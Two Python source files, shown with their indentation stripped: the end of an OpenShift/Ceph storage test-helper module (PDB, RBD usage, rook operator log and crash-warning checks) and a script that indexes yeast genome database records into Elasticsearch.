f"The expected disruptions_allowed is: {disruptions_allowed}.The actual one is {mon_pdb[0]}"
)
if max_unavailable_mon != mon_pdb[2]:
result = False
logger.error(
f"The expected max_unavailable_mon is {max_unavailable_mon}.The actual one is {mon_pdb[2]}"
)
return result
@retry(CommandFailed, tries=10, delay=30, backoff=1)
def run_cmd_verify_cli_output(
cmd=None, expected_output_lst=(), cephtool_cmd=False, debug_node=None
):
"""
Run command and verify its output
Args:
cmd(str): cli command
expected_output_lst(set): A set of strings that need to be included in the command output.
cephtool_cmd(bool): command on ceph-tool pod
debug_node(str): name of node
Returns:
bool: True of all strings are included in the command output, False otherwise
"""
if cephtool_cmd is True:
tool_pod = pod.get_ceph_tools_pod()
cmd_start = f"oc rsh -n openshift-storage {tool_pod.name} "
cmd = f"{cmd_start} {cmd}"
elif debug_node is not None:
cmd_start = f"oc debug nodes/{debug_node} -- chroot /host /bin/bash -c "
cmd = f'{cmd_start} "{cmd}"'
out = run_cmd(cmd=cmd)
logger.info(out)
for expected_output in expected_output_lst:
if expected_output not in out:
return False
return True
def check_rbd_image_used_size(
pvc_objs, usage_to_compare, rbd_pool=constants.DEFAULT_BLOCKPOOL, expect_match=True
):
"""
Check if RBD image used size of the PVCs are matching with the given value
Args:
pvc_objs (list): List of PVC objects
usage_to_compare (str): Value of image used size to be compared with actual value. eg: "5GiB"
rbd_pool (str): Name of the pool
expect_match (bool): True to verify the used size is equal to 'usage_to_compare' value.
False to verify the used size is not equal to 'usage_to_compare' value.
Returns:
bool: True if the verification is success for all the PVCs, False otherwise
"""
ct_pod = pod.get_ceph_tools_pod()
no_match_list = []
for pvc_obj in pvc_objs:
rbd_image_name = pvc_obj.get_rbd_image_name
du_out = ct_pod.exec_ceph_cmd(
ceph_cmd=f"rbd du -p {rbd_pool} {rbd_image_name}",
format="",
)
used_size = "".join(du_out.strip().split()[-2:])
if expect_match:
if usage_to_compare != used_size:
logger.error(
f"Rbd image {rbd_image_name} of PVC {pvc_obj.name} did not meet the expectation."
f" Expected used size: {usage_to_compare}. Actual used size: {used_size}. "
f"Rbd du out: {du_out}"
)
no_match_list.append(pvc_obj.name)
else:
if usage_to_compare == used_size:
logger.error(
f"Rbd image {rbd_image_name} of PVC {pvc_obj.name} did not meet the expectation. "
f"Expected the used size to be diferent than {usage_to_compare}. "
f"Actual used size: {used_size}. Rbd du out: {du_out}"
)
no_match_list.append(pvc_obj.name)
if no_match_list:
logger.error(
f"RBD image used size of these PVCs did not meet the expectation - {no_match_list}"
)
return False
return True
def set_configmap_log_level_rook_ceph_operator(value):
"""
Set ROOK_LOG_LEVEL on configmap of rook-ceph-operator
Args:
value (str): type of log
"""
path = "/data/ROOK_LOG_LEVEL"
params = f"""[{{"op": "add", "path": "{path}", "value": "{value}"}}]"""
configmap_obj = OCP(
kind=constants.CONFIGMAP,
namespace=constants.OPENSHIFT_STORAGE_NAMESPACE,
resource_name=constants.ROOK_OPERATOR_CONFIGMAP,
)
logger.info(f"Setting ROOK_LOG_LEVEL to: {value}")
configmap_obj.patch(params=params, format_type="json")
def get_logs_rook_ceph_operator():
"""
Get logs from a rook_ceph_operator pod
Returns:
str: Output from 'oc get logs rook-ceph-operator command
"""
logger.info("Get logs from rook_ceph_operator pod")
rook_ceph_operator_objs = pod.get_operator_pods()
return pod.get_pod_logs(pod_name=rook_ceph_operator_objs[0].name)
def check_osd_log_exist_on_rook_ceph_operator_pod(
last_log_date_time_obj, expected_strings=(), unexpected_strings=()
):
"""
Verify logs contain the expected strings and the logs do not
contain the unexpected strings
Args:
last_log_date_time_obj (datetime obj): type of log
expected_strings (list): verify the logs contain the expected strings
unexpected_strings (list): verify the logs do not contain the strings
Returns:
bool: True if logs contain the expected strings and the logs do not
contain the unexpected strings, False otherwise
"""
logger.info("Respin OSD pod")
osd_pod_objs = pod.get_osd_pods()
osd_pod_obj = random.choice(osd_pod_objs)
osd_pod_obj.delete()
new_logs = list()
rook_ceph_operator_logs = get_logs_rook_ceph_operator()
for line in rook_ceph_operator_logs.splitlines():
log_date_time_obj = get_event_line_datetime(line)
if log_date_time_obj and log_date_time_obj > last_log_date_time_obj:
new_logs.append(line)
res_expected = False
res_unexpected = True
for new_log in new_logs:
if all(
expected_string.lower() in new_log.lower()
for expected_string in expected_strings
):
res_expected = True
logger.info(f"{new_log} contain expected strings {expected_strings}")
break
for new_log in new_logs:
if any(
unexpected_string.lower() in new_log.lower()
for unexpected_string in unexpected_strings
):
logger.error(f"{new_log} contain unexpected strings {unexpected_strings}")
res_unexpected = False
break
return res_expected & res_unexpected
def get_last_log_time_date():
"""
Get last log time
Returns:
last_log_date_time_obj (datetime obj): type of log
"""
logger.info("Get last log time")
rook_ceph_operator_logs = get_logs_rook_ceph_operator()
for line in rook_ceph_operator_logs.splitlines():
log_date_time_obj = get_event_line_datetime(line)
if log_date_time_obj:
last_log_date_time_obj = log_date_time_obj
return last_log_date_time_obj
def clear_crash_warning_and_osd_removal_leftovers():
"""
Clear crash warnings and osd removal leftovers. This function can be used for example,
after the device replacement test or the node replacement test.
"""
is_deleted = pod.delete_all_osd_removal_jobs()
if is_deleted:
logger.info("Successfully deleted all the ocs-osd-removal jobs")
is_osd_pods_running = pod.wait_for_pods_to_be_running(
pod_names=[osd_pod.name for osd_pod in pod.get_osd_pods()], timeout=120
)
if not is_osd_pods_running:
logger.warning("There are still osds down. Can't clear ceph crash warnings")
return
is_daemon_recently_crash_warnings = run_cmd_verify_cli_output(
cmd="ceph health detail",
expected_output_lst={"HEALTH_WARN", "daemons have recently crashed"},
cephtool_cmd=True,
)
if is_daemon_recently_crash_warnings:
logger.info("Clear all ceph crash warnings")
ct_pod = pod.get_ceph_tools_pod()
ct_pod.exec_ceph_cmd(ceph_cmd="ceph crash archive-all")
else:
logger.info("There are no daemon crash warnings")
def get_noobaa_url():
"""
Get the URL of noobaa console
Returns:
str: url of noobaa console
"""
ocp_obj = OCP(kind=constants.ROUTE, namespace=defaults.ROOK_CLUSTER_NAMESPACE)
route_obj = ocp_obj.get(resource_name="noobaa-mgmt")
return route_obj["spec"]["host"]
def select_unique_pvcs(pvcs):
"""
Get the PVCs with unique access mode and volume mode combination.
Args:
pvcs(list): List of PVC objects
Returns:
list: List of selected PVC objects
"""
pvc_dict = {}
for pvc_obj in pvcs:
pvc_data = pvc_obj.get()
access_mode_volume_mode = (
pvc_data["spec"]["accessModes"][0],
pvc_data["spec"].get("volumeMode"),
)
pvc_dict[access_mode_volume_mode] = pvc_dict.get(
access_mode_volume_mode, pvc_obj
)
return pvc_dict.values()
def mon_pods_running_on_same_node():
"""
Verifies two mons are running on same node
"""
mon_running_nodes = node.get_mon_running_nodes()
if len(mon_running_nodes) != len(set(mon_running_nodes)):
logger.error(f"Mons running on nodes: {mon_running_nodes}")
raise UnexpectedBehaviour("Two or more mons running on same node")
logger.info("Mons are running on different nodes")
def get_failure_domain():
"""
Get Failure Domain
Returns:
string: type of failure domain
"""
from ocs_ci.ocs.resources.storage_cluster import get_storage_cluster
storage_cluster_obj = get_storage_cluster()
return storage_cluster_obj.data["items"][0]["status"]["failureDomain"]
def modify_statefulset_replica_count(statefulset_name, replica_count):
"""
Function to modify statefulset replica count,
i.e to scale up or down statefulset
Args:
statefulset_namee (str): Name of statefulset
replica_count (int): replica count to be changed to
Returns:
bool: True in case if changes are applied. False otherwise
"""
ocp_obj = OCP(kind=constants.STATEFULSET, namespace=defaults.ROOK_CLUSTER_NAMESPACE)
params = f'{{"spec": {{"replicas": {replica_count}}}}}'
return ocp_obj.patch(resource_name=statefulset_name, params=params)
def get_event_line_datetime(event_line):
"""
Get the event line datetime
Args:
event_line (str): The event line to get it's datetime
Returns:
datetime object: The event line datetime
"""
if re.search(r"\d{4}-\d{2}-\d{2}", event_line):
return datetime.datetime.strptime(event_line[:26], "%Y-%m-%d %H:%M:%S.%f")
else:
return None
def get_rook_ceph_pod_events(pod_name):
"""
Get the rook ceph pod events from the rook ceph pod operator logs
Args:
pod_name (str): The rook ceph pod name to get the events
Returns:
list: List of all the event lines with the specific pod
"""
rook_ceph_operator_event_lines = get_logs_rook_ceph_operator().splitlines()
return [line for line in rook_ceph_operator_event_lines if pod_name in line]
def get_rook_ceph_pod_events_by_keyword(pod_name, keyword):
"""
Get the rook ceph pod events with the keyword 'keyword' from the rook ceph pod operator logs
Args:
pod_name (str): The rook ceph pod name to get the events
keyword (str): The keyword to search in the events
Returns:
list: List of all the event lines with the specific pod that has the keyword 'keyword'
"""
pod_event_lines = get_rook_ceph_pod_events(pod_name)
return [
event_line
for event_line in pod_event_lines
if keyword.lower() in event_line.lower()
]
def wait_for_rook_ceph_pod_status(pod_obj, desired_status, timeout=420):
"""
Wait for the rook ceph pod to reach the desired status. If the pod didn't reach the
desired status, check if the reason is that the pod is not found. If this is the case,
check in the rook ceph pod operator logs to see if the pod reached the desired status.
Args:
pod_obj (ocs_ci.ocs.resources.pod.Pod): The rook ceph pod object
desired_status (str): The desired status of the pod to wait for
timeout (int): time to wait for the pod to reach the desired status
Returns:
bool: True if the rook ceph pod to reach the desired status. False, otherwise
"""
start_log_datetime = get_last_log_time_date()
try:
wait_for_resource_state(pod_obj, desired_status, timeout=timeout)
except (ResourceWrongStatusException, CommandFailed) as e:
if "not found" in str(e):
logger.info(
f"Failed to find the pod {pod_obj.name}. Trying to search for the event "
f"in rook ceph operator logs..."
)
pod_event_lines_with_desired_status = get_rook_ceph_pod_events_by_keyword(
pod_obj.name, keyword=desired_status
)
last_pod_event_line = pod_event_lines_with_desired_status[-1]
last_pod_event_datetime = get_event_line_datetime(last_pod_event_line)
if last_pod_event_datetime > start_log_datetime:
logger.info(
f"Found the event of pod {pod_obj.name} with status {desired_status} in "
f"rook ceph operator logs. The event line is: {last_pod_event_line}"
)
return True
else:
return False
else:
logger.info(f"An error has occurred when trying to get the pod object: {e}")
return False
return True
def check_number_of_mon_pods(expected_mon_num=3):
"""
Function to check the number of monitoring pods
Returns:
bool: True if number of mon pods is 3, False otherwise
"""
mon_pod_list = pod.get_mon_pods()
if len(mon_pod_list) == expected_mon_num:
logger.info(f"Number of mons equal to {expected_mon_num}")
return True
logger.error(f"Number of Mons not equal to {expected_mon_num} {mon_pod_list}")
return False
|
index_es_7.py
|
from src.models import DBSession, Base, Colleague, ColleagueLocus, Dbentity, Locusdbentity, Filedbentity, FileKeyword, LocusAlias, Dnasequenceannotation, So, Locussummary, Phenotypeannotation, PhenotypeannotationCond, Phenotype, Goannotation, Go, Goslimannotation, Goslim, Apo, Straindbentity, Strainsummary, Reservedname, GoAlias, Goannotation, Referencedbentity, Referencedocument, Referenceauthor, ReferenceAlias, Chebi, Disease, Diseaseannotation, DiseaseAlias, Complexdbentity, ComplexAlias, ComplexReference, Complexbindingannotation, Tools, Alleledbentity, AlleleAlias
from sqlalchemy import create_engine, and_
from elasticsearch import Elasticsearch
# from mapping import mapping
from es7_mapping import mapping
import os
import requests
from threading import Thread
import json
import collections
from index_es_helpers import IndexESHelper
import concurrent.futures
import uuid
import logging
engine = create_engine(os.environ["NEX2_URI"], pool_recycle=3600)
DBSession.configure(bind=engine)
Base.metadata.bind = engine
INDEX_NAME = os.environ.get("ES_INDEX_NAME", "searchable_items_aws")
DOC_TYPE = "searchable_item"
ES_URI = os.environ["WRITE_ES_URI"]
es = Elasticsearch(ES_URI, retry_on_timeout=True)
def delete_mapping():
print("Deleting mapping...")
response = requests.delete(ES_URI + INDEX_NAME + "/")
if response.status_code != 200:
print(("ERROR: " + str(response.json())))
else:
print("SUCCESS")
def put_mapping():
print("Putting mapping... ")
try:
response = requests.put(ES_URI + INDEX_NAME + "/", json=mapping)
if response.status_code != 200:
print(("ERROR: " + str(response.json())))
else:
print("SUCCESS")
except Exception as e:
print(e)
def cleanup():
delete_mapping()
put_mapping()
def setup():
# see if index exists, if not create it
indices = list(es.indices.get_alias().keys())
index_exists = INDEX_NAME in indices
if not index_exists:
put_mapping()
def index_not_mapped_genes():
url = "https://downloads.yeastgenome.org/curation/literature/genetic_loci.tab"
bulk_data = []
with open("./scripts/search/not_mapped.json",
"r") as json_data:
_data = json.load(json_data)
print(("indexing " + str(len(_data)) + " not physically mapped genes"))
for item in _data:
temp_aliases = []
if len(item["FEATURE_NAME"]) > 0:
obj = {
"name": item["FEATURE_NAME"],
"locus_name": item["FEATURE_NAME"],
"unmapped_name": item["FEATURE_NAME"],
"href": url,
"category": "locus",
"feature_type": ["Unmapped Genetic Loci"],
"aliases": item["ALIASES"].split("|"),
"description": item["DESCRIPTION"],
"is_quick_flag": "False"
}
bulk_data.append({
"index": {
"_index": INDEX_NAME,
"_id": str(uuid.uuid4())
}
})
bulk_data.append(obj)
if len(bulk_data) == 300:
es.bulk(index=INDEX_NAME, body=bulk_data, refresh=True)
bulk_data = []
if len(bulk_data) > 0:
es.bulk(index=INDEX_NAME, body=bulk_data, refresh=True)
def index_downloads():
bulk_data = []
dbentity_file_obj = IndexESHelper.get_file_dbentity_keyword()
files = DBSession.query(Filedbentity).filter(Filedbentity.is_public == True,
Filedbentity.s3_url != None).all()
print(("indexing " + str(len(files)) + " download files"))
for x in files:
try:
keyword = []
status = ""
temp = dbentity_file_obj.get(x.dbentity_id)
if temp:
keyword = temp
if (x.dbentity_status == "Active" or x.dbentity_status == "Archived"):
if x.dbentity_status == "Active":
status = "Active"
else:
status = "Archived"
obj = {
"name":
x.display_name,
"raw_display_name":
x.display_name,
"filename": " ".join(x.display_name.split("_")),
"file_name_format": " ".join(x.display_name.split("_")),
"href": x.s3_url if x else None,
"category":
"download",
"description":
x.description,
"keyword":
keyword,
"format":
str(x.format.display_name),
"status":
str(status),
"file_size":
str(IndexESHelper.convertBytes(x.file_size))
if x.file_size is not None else x.file_size,
"year":
str(x.year),
"readme_url": x.readme_file.s3_url if x.readme_file else None,
"topic": x.topic.display_name,
"data": x.data.display_name,
"path_id": x.get_path_id()
}
bulk_data.append({
"index": {
"_index": INDEX_NAME,
"_id": str(uuid.uuid4())
}
})
bulk_data.append(obj)
if len(bulk_data) == 50:
es.bulk(index=INDEX_NAME, body=bulk_data, refresh=True)
bulk_data = []
except Exception as e:
logging.error(e.message)
if len(bulk_data) > 0:
es.bulk(index=INDEX_NAME, body=bulk_data, refresh=True)
def index_colleagues():
colleagues = DBSession.query(Colleague).all()
_locus_ids = IndexESHelper.get_colleague_locus()
_locus_names = IndexESHelper.get_colleague_locusdbentity()
_combined_list = IndexESHelper.combine_locusdbentity_colleague(
colleagues, _locus_names, _locus_ids)
print(("Indexing " + str(len(colleagues)) + " colleagues"))
bulk_data = []
for item_k, item_v in list(_combined_list.items()):
bulk_data.append({
"index": {
"_index": INDEX_NAME,
"_id": str(uuid.uuid4())
}
})
bulk_data.append(item_v)
if len(bulk_data) == 1000:
es.bulk(index=INDEX_NAME, body=bulk_data, refresh=True)
bulk_data = []
if len(bulk_data) > 0:
es.bulk(index=INDEX_NAME, body=bulk_data, refresh=True)
def index_genes():
# Indexing just the S228C genes
# dbentity: 1364643 (id) -> straindbentity -> 274901 (taxonomy_id)
# list of dbentities comes from table DNASequenceAnnotation with taxonomy_id 274901
# feature_type comes from DNASequenceAnnotation as well
gene_ids_so = DBSession.query(
Dnasequenceannotation.dbentity_id, Dnasequenceannotation.so_id).filter(
Dnasequenceannotation.taxonomy_id == 274901).all()
dbentity_ids_to_so = {}
dbentity_ids = set([])
so_ids = set([])
for gis in gene_ids_so:
dbentity_ids.add(gis[0])
so_ids.add(gis[1])
dbentity_ids_to_so[gis[0]] = gis[1]
# add some non S288C genes
not_s288c = DBSession.query(Locusdbentity.dbentity_id).filter(
Locusdbentity.not_in_s288c == True).all()
for id in not_s288c:
dbentity_ids.add(id[0])
# assume non S288C features to be ORFs
dbentity_ids_to_so[id[0]] = 263757
all_genes = DBSession.query(Locusdbentity).filter(
Locusdbentity.dbentity_id.in_(list(dbentity_ids))).all()
# make list of merged/deleted genes so they don"t redirect when they show up as an alias
merged_deleted_r = DBSession.query(Locusdbentity.format_name).filter(
Locusdbentity.dbentity_status.in_(["Merged", "Deleted"])).all()
merged_deleted = [d[0] for d in merged_deleted_r]
feature_types_db = DBSession.query(
So.so_id, So.display_name).filter(So.so_id.in_(list(so_ids))).all()
feature_types = {}
for ft in feature_types_db:
feature_types[ft[0]] = ft[1]
tc_numbers_db = DBSession.query(LocusAlias).filter_by(
alias_type="TC number").all()
tc_numbers = {}
for tc in tc_numbers_db:
if tc.locus_id in tc_numbers:
tc_numbers[tc.locus_id].append(tc.display_name)
else:
tc_numbers[tc.locus_id] = [tc.display_name]
ec_numbers_db = DBSession.query(LocusAlias).filter_by(
alias_type="EC number").all()
ec_numbers = {}
for ec in ec_numbers_db:
if ec.locus_id in ec_numbers:
ec_numbers[ec.locus_id].append(ec.display_name)
else:
ec_numbers[ec.locus_id] = [ec.display_name]
secondary_db = DBSession.query(LocusAlias).filter_by(
alias_type="SGDID Secondary").all()
secondary_sgdids = {}
for sid in secondary_db:
if sid.locus_id in secondary_sgdids:
secondary_sgdids[sid.locus_id].append(sid.display_name)
else:
secondary_sgdids[sid.locus_id] = [sid.display_name]
bulk_data = []
print(("Indexing " + str(len(all_genes)) + " genes"))
##### test newer methods ##########
_summary = IndexESHelper.get_locus_dbentity_summary()
_protein = IndexESHelper.get_locus_dbentity_alias(["NCBI protein name"])
_phenos = IndexESHelper.get_locus_phenotypeannotation()
_goids = IndexESHelper.get_locus_go_annotation()
_aliases_raw = IndexESHelper.get_locus_dbentity_alias(
["Uniform", "Non-uniform", "Retired name", "UniProtKB ID"])
###################################
# TODO: remove line below in the next release
# not_mapped_genes = IndexESHelper.get_not_mapped_genes()
is_quick_flag = True
for gene in all_genes:
_systematic_name = ''
_name = ''
if gene.gene_name:
_name = gene.gene_name
if gene.systematic_name and gene.gene_name != gene.systematic_name:
_name += " / " + gene.systematic_name
else:
_name = gene.systematic_name
_systematic_name = gene.systematic_name
#summary = DBSession.query(Locussummary.text).filter_by(locus_id=gene.dbentity_id).all()
summary = []
if (_summary is not None):
summary = _summary.get(gene.dbentity_id)
#protein = DBSession.query(LocusAlias.display_name).filter_by(locus_id=gene.dbentity_id, alias_type="NCBI protein name").one_or_none()
protein = _protein.get(gene.dbentity_id)
if protein is not None:
protein = protein[0].display_name
# TEMP don"t index due to schema schange
# sequence_history = DBSession.query(Locusnoteannotation.note).filter_by(dbentity_id=gene.dbentity_id, note_type="Sequence").all()
# gene_history = DBSession.query(Locusnoteannotation.note).filter_by(dbentity_id=gene.dbentity_id, note_type="Locus").all()
#phenotype_ids = DBSession.query(Phenotypeannotation.phenotype_id).filter_by(dbentity_id=gene.dbentity_id).all()
phenotype_ids = []
if _phenos is not None:
temp = _phenos.get(gene.dbentity_id)
if temp is not None:
phenotype_ids = [x.phenotype_id for x in temp]
if len(phenotype_ids) > 0:
phenotypes = DBSession.query(Phenotype.display_name).filter(
Phenotype.phenotype_id.in_(phenotype_ids)).all()
else:
phenotypes = []
#go_ids = DBSession.query(Goannotation.go_id).filter(and_(Goannotation.go_qualifier != "NOT", Goannotation.dbentity_id == gene.dbentity_id)).all()
go_ids = _goids.get(gene.dbentity_id)
if go_ids is not None:
go_ids = [x.go_id for x in go_ids]
else:
go_ids = []
go_annotations = {
"cellular component": set([]),
"molecular function": set([]),
"biological process": set([])
}
if len(go_ids) > 0:
#go_ids = [g[0] for g in go_ids]
go = DBSession.query(
Go.display_name,
Go.go_namespace).filter(Go.go_id.in_(go_ids)).all()
for g in go:
go_annotations[g[1]].add(g[0] + " (direct)")
go_slim_ids = DBSession.query(Goslimannotation.goslim_id).filter(
Goslimannotation.dbentity_id == gene.dbentity_id).all()
if len(go_slim_ids) > 0:
go_slim_ids = [g[0] for g in go_slim_ids]
go_slim = DBSession.query(Goslim.go_id, Goslim.display_name).filter(
Goslim.goslim_id.in_(go_slim_ids)).all()
go_ids = [g[0] for g in go_slim]
go = DBSession.query(
Go.go_id, Go.go_namespace).filter(Go.go_id.in_(go_ids)).all()
for g in go:
for gs in go_slim:
if (gs[0] == g[0]):
go_annotations[g[1]].add(gs[1])
# add "quick direct" keys such as aliases, SGD, UniProt ID and format aliases
#aliases_raw = DBSession.query(LocusAlias.display_name, LocusAlias.alias_type).filter(and_(LocusAlias.locus_id==gene.dbentity_id, LocusAlias.alias_type.in_())).all()
aliases_raw = _aliases_raw.get(gene.dbentity_id)
alias_quick_direct_keys = []
aliases = []
if aliases_raw is not None:
for alias_item in aliases_raw:
name = alias_item.display_name
if name not in merged_deleted:
alias_quick_direct_keys.append(name)
if alias_item.alias_type != "UniProtKB ID":
aliases.append(name)
'''for d in aliases_raw:
name = d[0]
if name not in merged_deleted:
alias_quick_direct_keys.append(name)
if d[1] != "UniProtKB ID":
aliases.append(name)'''
# make everything in keys lowercase to ignore case
keys = []
_keys = [gene.gene_name, gene.systematic_name, gene.sgdid
] + alias_quick_direct_keys
# Add SGD:<gene SGDID> to list of keywords for quick search
_keys.append("SGD:{}".format(gene.sgdid))
# If this gene has a reservedname associated with it, add that reservedname to
# the list of keywords used for the quick search of this gene
reservedname = DBSession.query(Reservedname).filter_by(
locus_id=gene.dbentity_id).one_or_none()
if reservedname:
_keys.append(reservedname.display_name)
for k in _keys:
if k:
keys.append(k.lower())
ncbi_arr = None
if gene.dbentity_id:
ncbi_arr = IndexESHelper.get_locus_ncbi_data(gene.dbentity_id)
obj = {
"name":
_name,
"locus_name":
_name,
"sys_name":
_systematic_name,
"href":
gene.obj_url,
"description":
gene.description,
"category":
"locus",
"feature_type":
feature_types[dbentity_ids_to_so[gene.dbentity_id]],
"name_description":
gene.name_description,
"summary":
summary,
"locus_summary":
summary,
"phenotypes": [p[0] for p in phenotypes],
"aliases":
aliases,
"cellular_component":
list(go_annotations["cellular component"] - set([
"cellular component", "cellular component (direct)",
"cellular_component", "cellular_component (direct)"
])),
"biological_process":
list(go_annotations["biological process"] - set([
"biological process (direct)", "biological process",
"biological_process (direct)", "biological_process"
])),
"molecular_function":
list(go_annotations["molecular function"] - set([
"molecular function (direct)", "molecular function",
"molecular_function (direct)", "molecular_function"
])),
"ec_number":
ec_numbers.get(gene.dbentity_id),
"protein":
protein,
"tc_number":
tc_numbers.get(gene.dbentity_id),
"secondary_sgdid":
secondary_sgdids.get(gene.dbentity_id),
"status":
gene.dbentity_status,
# TEMP don"t index due to schema change
# "sequence_history": [s[0] for s in sequence_history],
# "gene_history": [g[0] for g in gene_history],
"bioentity_id":
gene.dbentity_id,
"keys":
list(keys),
"is_quick_flag": str(is_quick_flag),
"ncbi": ncbi_arr
}
bulk_data.append({
"index": {
"_index": INDEX_NAME,
"_id": str(uuid.uuid4())
}
})
bulk_data.append(obj)
if len(bulk_data) == 1000:
es.bulk(index=INDEX_NAME, body=bulk_data, refresh=True)
bulk_data = []
if len(bulk_data) > 0:
es.bulk(index=INDEX_NAME, body=bulk_data, refresh=True)
def index_phenotypes():
bulk_data = []
phenotypes = DBSession.query(Phenotype).all()
_result = IndexESHelper.get_pheno_annotations(phenotypes)
print(("Indexing " + str(len(_result)) + " phenotypes"))
for phenotype_item in _result:
bulk_data.append({
"index": {
"_index": INDEX_NAME,
"_id": str(uuid.uuid4())
}
})
bulk_data.append(phenotype_item)
if len(bulk_data) == 50:
es.bulk(index=INDEX_NAME, body=bulk_data, refresh=True)
bulk_data = []
if len(bulk_data) > 0:
es.bulk(index=INDEX_NAME, body=bulk_data, refresh=True)
def index_observables():
observables = DBSession.query(Apo).filter_by(
apo_namespace="observable").all()
print(("Indexing " + str(len(observables)) + " observables"))
bulk_data = []
for observable in observables:
obj = {
"name": observable.display_name,
"observable_name": observable.display_name,
"href": observable.obj_url,
"description": observable.description,
"category": "observable",
"keys": []
}
bulk_data.append({
"index": {
"_index": INDEX_NAME,
"_id": str(uuid.uuid4())
}
})
bulk_data.append(obj)
if len(bulk_data) == 300:
es.bulk(index=INDEX_NAME, body=bulk_data, refresh=True)
bulk_data = []
if len(bulk_data) > 0:
es.bulk(index=INDEX_NAME, body=bulk_data, refresh=True)
def index_strains():
strains = DBSession.query(Straindbentity).all()
print(("Indexing " + str(len(strains)) + " strains"))
for strain in strains:
key_values = [
strain.display_name, strain.format_name, strain.genbank_id
]
keys = set([])
for k in key_values:
if k is not None:
keys.add(k.lower())
paragraph = DBSession.query(Strainsummary.text).filter_by(
strain_id=strain.dbentity_id).one_or_none()
description = None
if paragraph:
description = paragraph[0]
obj = {
"name": strain.display_name,
"strain_name": strain.display_name,
"href": strain.obj_url,
"description": strain.headline,
"category": "strain",
"keys": list(keys)
}
es.index(
index=INDEX_NAME, body=obj, id=str(uuid.uuid4()))
def index_reserved_names():
# only index reservednames that do not have a locus associated with them
reserved_names = DBSession.query(Reservedname).all()
print(("Indexing " + str(len(reserved_names)) + " reserved names"))
for reserved_name in reserved_names:
name = reserved_name.display_name
href = reserved_name.obj_url
keys = [reserved_name.display_name.lower()]
# change name if has an orf
if reserved_name.locus_id:
locus = DBSession.query(Locusdbentity).filter(
Locusdbentity.dbentity_id == reserved_name.locus_id).one_or_none()
name = name + " / " + locus.systematic_name
href = locus.obj_url
keys = []
obj = {
"name": name,
"reserved_name": name,
"href": href,
"description": reserved_name.name_description,
"category": "reserved_name",
"keys": keys
}
es.index(
index=INDEX_NAME, body=obj, id=str(uuid.uuid4()))
def load_go_id_blacklist(list_filename):
go_id_blacklist = set()
for l in open(list_filename, "r"):
go_id_blacklist.add(l[:-1])
return go_id_blacklist
def index_go_terms():
go_id_blacklist = load_go_id_blacklist(
"scripts/search/go_id_blacklist.lst")
gos = DBSession.query(Go).all()
print(("Indexing " + str(len(gos) - len(go_id_blacklist)) + " GO terms"))
bulk_data = []
for go in gos:
if go.goid in go_id_blacklist:
continue
synonyms = DBSession.query(GoAlias.display_name).filter_by(
go_id=go.go_id).all()
references = set([])
gene_ontology_loci = set([])
annotations = DBSession.query(Goannotation).filter_by(
go_id=go.go_id).all()
for annotation in annotations:
if annotation.go_qualifier != "NOT":
gene_ontology_loci.add(annotation.dbentity.display_name)
references.add(annotation.reference.display_name)
numerical_id = go.goid.split(":")[1]
key_values = [
go.goid, "GO:" + str(int(numerical_id)), numerical_id,
str(int(numerical_id))
]
keys = set([])
for k in key_values:
if k is not None:
keys.add(k.lower())
obj = {
"name": go.display_name,
"go_name": go.display_name,
"href": go.obj_url,
"description": go.description,
"synonyms": [s[0] for s in synonyms],
"go_id": go.goid,
"gene_ontology_loci": sorted(list(gene_ontology_loci)),
"number_annotations": len(annotations),
"references": list(references),
"category": go.go_namespace.replace(" ", "_"),
"keys": list(keys)
}
bulk_data.append({
"index": {
"_index": INDEX_NAME,
"_id": str(uuid.uuid4())
}
})
bulk_data.append(obj)
if len(bulk_data) == 800:
es.bulk(index=INDEX_NAME, body=bulk_data, refresh=True)
bulk_data = []
if len(bulk_data) > 0:
es.bulk(index=INDEX_NAME, body=bulk_data, refresh=True)
def index_disease_terms():
dos = DBSession.query(Disease).all()
print(("Indexing " + str(len(dos)) + " DO terms"))
bulk_data = []
for do in dos:
synonyms = DBSession.query(DiseaseAlias.display_name).filter_by(
disease_id=do.disease_id).all()
references = set([])
disease_loci = set([])
annotations = DBSession.query(Diseaseannotation).filter_by(
disease_id=do.disease_id).all()
for annotation in annotations:
if annotation.disease_qualifier != "NOT":
disease_loci.add(annotation.dbentity.display_name)
references.add(annotation.reference.display_name)
if do.doid != 'derives_from':
numerical_id = do.doid.split(":")[1]
key_values = [
do.doid, "DO:" + str(int(numerical_id)), numerical_id,
str(int(numerical_id))
]
keys = set([])
for k in key_values:
if k is not None:
keys.add(k.lower())
obj = {
"name": do.display_name,
"disease_name": do.display_name,
"category": "disease",
"href": do.obj_url,
"description": do.description,
"synonyms": [s[0] for s in synonyms],
"doid": do.doid,
"disease_loci": sorted(list(disease_loci)),
"number_annotations": len(annotations),
"references": list(references),
"keys": list(keys)
}
bulk_data.append({
"index": {
"_index": INDEX_NAME,
"_id": str(uuid.uuid4())
}
})
bulk_data.append(obj)
if len(bulk_data) == 800:
es.bulk(index=INDEX_NAME, body=bulk_data, refresh=True)
bulk_data = []
if len(bulk_data) > 0:
es.bulk(index=INDEX_NAME, body=bulk_data, refresh=True)
def index_references():
_ref_loci = IndexESHelper.get_dbentity_locus_note()
_references = DBSession.query(Referencedbentity).all()
_abstracts = IndexESHelper.get_ref_abstracts()
_authors = IndexESHelper.get_ref_authors()
_aliases = IndexESHelper.get_ref_aliases()
bulk_data = []
print(("Indexing " + str(len(_references)) + " references"))
for reference in _references:
reference_loci = []
if len(_ref_loci) > 0:
temp_loci = _ref_loci.get(reference.dbentity_id)
if temp_loci is not None:
reference_loci = list(
set([x.display_name for x in IndexESHelper.flattern_list(temp_loci)]))
abstract = _abstracts.get(reference.dbentity_id)
if abstract is not None:
abstract = abstract[0]
sec_sgdids = _aliases.get(reference.dbentity_id)
sec_sgdid = None
authors = _authors.get(reference.dbentity_id)
if sec_sgdids is not None:
sec_sgdid = sec_sgdids[0]
if authors is None:
authors = []
journal = reference.journal
if journal:
journal = journal.display_name
key_values = [
reference.pmcid, reference.pmid, "pmid: " + str(reference.pmid),
"pmid:" + str(reference.pmid), "pmid " + str(reference.pmid),
reference.sgdid
]
keys = set([])
for k in key_values:
if k is not None:
keys.add(str(k).lower())
obj = {
"name": reference.citation,
"reference_name": reference.citation,
"href": reference.obj_url,
"description": abstract,
"author": authors,
"journal": journal,
"year": str(reference.year),
"reference_loci": reference_loci,
"secondary_sgdid": sec_sgdid,
"category": "reference",
"keys": list(keys)
}
bulk_data.append({
"index": {
"_index": INDEX_NAME,
"_id": str(uuid.uuid4())
}
})
bulk_data.append(obj)
if len(bulk_data) == 1000:
es.bulk(index=INDEX_NAME, body=bulk_data, refresh=True)
bulk_data = []
